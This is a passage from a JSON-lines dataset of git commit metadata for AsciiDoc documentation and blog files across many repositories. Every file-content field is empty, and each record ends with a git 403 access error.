403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"14f50f4f52920899c08e42568321db6095651659","subject":"Deleted _posts\/2016-07-21-test.adoc","message":"Deleted _posts\/2016-07-21-test.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-21-test.adoc","new_file":"_posts\/2016-07-21-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a81d2075fe07b9147dbc3cd100ac5d87d00b4b1","subject":"Update 2018-11-10-Fear.adoc","message":"Update 2018-11-10-Fear.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2018-11-10-Fear.adoc","new_file":"_posts\/2018-11-10-Fear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"540893515868aa1ca7a9420908c9a32eed3d4b02","subject":"Bumping versions","message":"Bumping versions","repos":"spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream","old_file":"binders\/kinesis-binder\/spring-cloud-stream-binder-kinesis-docs\/src\/main\/asciidoc\/_configprops.adoc","new_file":"binders\/kinesis-binder\/spring-cloud-stream-binder-kinesis-docs\/src\/main\/asciidoc\/_configprops.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93d76f602abbc76e6a403e0c0c072cdbaa431705","subject":"new Migration Guide to v3","message":"new Migration Guide to v3\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/migration-guide-30.asciidoc","new_file":"docs\/migration-guide-30.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b2256fb9e9f4b02bc5698d2956e5e951c8929bb7","subject":"NEXTGEN-9 #close Added back social, with explanation for AA propagation pain point","message":"NEXTGEN-9 #close Added back social, with explanation for AA propagation pain point\n","repos":"kbase\/nextgen,kbase\/nextgen,kbase\/nextgen","old_file":"docs\/challenges\/social.asciidoc","new_file":"docs\/challenges\/social.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kbase\/nextgen.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58d6c79c0019dee29d45901cb08e228eb647459e","subject":"[DOCS] Added ML limitation (elastic\/x-pack-elasticsearch#4081)","message":"[DOCS] Added ML limitation (elastic\/x-pack-elasticsearch#4081)\n\nOriginal commit: elastic\/x-pack-elasticsearch@378bf49b1de387e58c4e6b02d42b9a59b8e97cd2\n","repos":"GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/ml\/limitations.asciidoc","new_file":"docs\/en\/ml\/limitations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43a2572e7db079a660e1c26849214a64dbc0e206","subject":"[DOCS] Fixed typo in over_field_name","message":"[DOCS] Fixed typo in over_field_name\n\nOriginal commit: elastic\/x-pack-elasticsearch@c366d43448df66d95d9f83b5794deb853d3a81c5\n","repos":"gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/en\/ml\/populations.asciidoc","new_file":"docs\/en\/ml\/populations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c53e1689f633bcf1a590971968848bac95051343","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06844f356ede854de498bf0cf9660ebc805fb8e1","subject":"Added load balancing document","message":"Added load balancing document\n\nFirst version of load balancing document added. First few steps for\nsetting up an nginx load balancer\n","repos":"ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1","old_file":"documentation\/loadbalancing.adoc","new_file":"documentation\/loadbalancing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ohaz\/amos-ss15-proj1.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"1b63d429920edc636ba0157e0f2819d485c9c58a","subject":"Update 2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","message":"Update 2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cac8312270795d3250013d72256bc34f13959ab9","subject":"Update 2015-09-23-Yeah-About-that-story.adoc","message":"Update 2015-09-23-Yeah-About-that-story.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Yeah-About-that-story.adoc","new_file":"_posts\/2015-09-23-Yeah-About-that-story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aabbbb5db7cca0496716c2f657813ff8a46bd65d","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f20151fdd576f5519bbcf258107ba27b436cd472","subject":"Update 2016-06-10-studysite.adoc","message":"Update 2016-06-10-studysite.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-studysite.adoc","new_file":"_posts\/2016-06-10-studysite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6af30b780bb2321639a058fa27e32dcfe79687c8","subject":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","message":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1664bd5d160d0a1205852a1bf39d9438be7818cc","subject":"Update 2016-11-05-A-Practical-Look-at-Latency-in-Robotics-Ethernet-and-UDP.adoc","message":"Update 2016-11-05-A-Practical-Look-at-Latency-in-Robotics-Ethernet-and-UDP.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2016-11-05-A-Practical-Look-at-Latency-in-Robotics-Ethernet-and-UDP.adoc","new_file":"_posts\/2016-11-05-A-Practical-Look-at-Latency-in-Robotics-Ethernet-and-UDP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9fcd3616b620051a831e80c59bca555453b8e4d","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/implementation_details.adoc","new_file":"content\/writings\/implementation_details.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"33ff731e9750a1da8059718b8d5db2fc6d75cac8","subject":"Update 2016-03-01-git.adoc","message":"Update 2016-03-01-git.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-01-git.adoc","new_file":"_posts\/2016-03-01-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fa091e5720a30dce36a11ce78651d22227b2020","subject":"y2b create post iPhone 6: Top 5 Missing Features!","message":"y2b create post iPhone 6: Top 5 Missing Features!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-21-iPhone-6-Top-5-Missing-Features.adoc","new_file":"_posts\/2014-09-21-iPhone-6-Top-5-Missing-Features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dad60db68498f2a4f9bbd77e33d27573b116cf08","subject":"Update 2015-01-04-O-Suicidio-Mais-Bizarro-de-1994.adoc","message":"Update 2015-01-04-O-Suicidio-Mais-Bizarro-de-1994.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2015-01-04-O-Suicidio-Mais-Bizarro-de-1994.adoc","new_file":"_posts\/2015-01-04-O-Suicidio-Mais-Bizarro-de-1994.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e617c24dd7f9e3b43a1515af7357dc2940ecb1d9","subject":"Update 2016-12-07-Projet-Presidentielle-Francaise.adoc","message":"Update 2016-12-07-Projet-Presidentielle-Francaise.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-07-Projet-Presidentielle-Francaise.adoc","new_file":"_posts\/2016-12-07-Projet-Presidentielle-Francaise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca0139433dbe44648f1e5ec8a37c41a703c96898","subject":"Update 2015-07-07-Desarrollo-de-una-aplicacion-desde-cero-Implementacion-y-depuracion-del-Modelo-y-la-Vista.adoc","message":"Update 2015-07-07-Desarrollo-de-una-aplicacion-desde-cero-Implementacion-y-depuracion-del-Modelo-y-la-Vista.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-07-07-Desarrollo-de-una-aplicacion-desde-cero-Implementacion-y-depuracion-del-Modelo-y-la-Vista.adoc","new_file":"_posts\/2015-07-07-Desarrollo-de-una-aplicacion-desde-cero-Implementacion-y-depuracion-del-Modelo-y-la-Vista.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a87bc3d589eecc870dab7699719e79ba156d32f","subject":"Update 2016-02-28-react-native-Few-words-about-Navigator-and-scene-animation.adoc","message":"Update 2016-02-28-react-native-Few-words-about-Navigator-and-scene-animation.adoc\n","repos":"doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io","old_file":"_posts\/2016-02-28-react-native-Few-words-about-Navigator-and-scene-animation.adoc","new_file":"_posts\/2016-02-28-react-native-Few-words-about-Navigator-and-scene-animation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/doochik\/doochik.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d6fec0c23dc6e3ab1f6a889e07ae5420c018d1b","subject":"TELCODOCS-213 Updated with suggested changes","message":"TELCODOCS-213 Updated with suggested changes\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/ztp-ai-install-ocp-clusters-on-bare-metal.adoc","new_file":"modules\/ztp-ai-install-ocp-clusters-on-bare-metal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d10a75dfe98a3d86067f0db3e6d5896768e81ad1","subject":"Update 2016-03-11-Blog-Title.adoc","message":"Update 2016-03-11-Blog-Title.adoc","repos":"sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io","old_file":"_posts\/2016-03-11-Blog-Title.adoc","new_file":"_posts\/2016-03-11-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sinemaga\/sinemaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1eeec5fd68ee6e7e9ef6e42cd313362af4e62727","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e5994e44fab7d6dfdc3034f8e1f007452ce7ad2","subject":"Update 2016-07-03-Neuer-Post.adoc","message":"Update 2016-07-03-Neuer-Post.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2016-07-03-Neuer-Post.adoc","new_file":"_posts\/2016-07-03-Neuer-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"157507e06a620b0fa8d162087be89d57d9c766cb","subject":"Update 2016-04-07-Banner-grabbing.adoc","message":"Update 2016-04-07-Banner-grabbing.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38277ab99861ad37f9f07ccf61b6a043340993a4","subject":"Publish 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","message":"Publish 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3726c875608b056a2bf04d9f391cd532e638ca0","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1665f701956a218ec2a6e419b17d22dec79ae61e","subject":"Update 2017-05-21-Typeclasses-in-haskell.adoc","message":"Update 2017-05-21-Typeclasses-in-haskell.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-21-Typeclasses-in-haskell.adoc","new_file":"_posts\/2017-05-21-Typeclasses-in-haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abe5192e11a2bd9488f75fcc23966ce89834a082","subject":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","message":"Update 2016-11-23-what-buy-accepting-bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_file":"_posts\/2016-11-23-what-buy-accepting-bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0457c307a6f96e14559bb7952b516470dd3b28d","subject":"Update 2016-12-14-Tuesday-December-14th-2016.adoc","message":"Update 2016-12-14-Tuesday-December-14th-2016.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2016-12-14-Tuesday-December-14th-2016.adoc","new_file":"_posts\/2016-12-14-Tuesday-December-14th-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e559ed02c8d88fb2fefd8119ae6a3f1b0f0433af","subject":"doc\/minor","message":"doc\/minor\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c198b9b0e66a2e8912f2bfb7801113ccb90c3f42","subject":"Update 2016-04-16-Esto-es-un-test.adoc","message":"Update 2016-04-16-Esto-es-un-test.adoc","repos":"Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck,Lukas238\/the-holodeck","old_file":"_posts\/2016-04-16-Esto-es-un-test.adoc","new_file":"_posts\/2016-04-16-Esto-es-un-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lukas238\/the-holodeck.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00f82c831e43365ad8850aa90259553c8c16ba47","subject":"Create aws-cf.adoc","message":"Create aws-cf.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws-cf.adoc","new_file":"userguide\/tutorials\/aws-cf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eef992dab838593a305064f599eb8680a25d5d23","subject":"Add how to increase timeout","message":"Add how to increase timeout\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README_bugs.adoc","new_file":"README_bugs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7059fd164caba9c9a2da23008fcd6f0b2162997e","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f71bbe324e92af8221ab582efac5370004e892b","subject":"Update 2012-12-05-1336-Menggunakan-WinRAR-di-VPS.adoc","message":"Update 2012-12-05-1336-Menggunakan-WinRAR-di-VPS.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2012-12-05-1336-Menggunakan-WinRAR-di-VPS.adoc","new_file":"_posts\/2012-12-05-1336-Menggunakan-WinRAR-di-VPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b6aec3a06b1b8c94763d6bb348787c3d493c8cd","subject":"KUDU-1277 Remove kudu.split_keys example","message":"KUDU-1277 Remove kudu.split_keys example\n\nChange-Id: Ibb8930b4a434c490b570279f74ed1381ab41a445\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1652\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f388eb9dcd82a2da78e2636656cfd46d36903ecf","subject":"Add MANDATORY MATCH","message":"Add MANDATORY MATCH\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2016-01-26-mandatory-match.adoc","new_file":"cip\/CIP2016-01-26-mandatory-match.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"594cab1a0193000f117e3690675527155e3229dd","subject":"Update 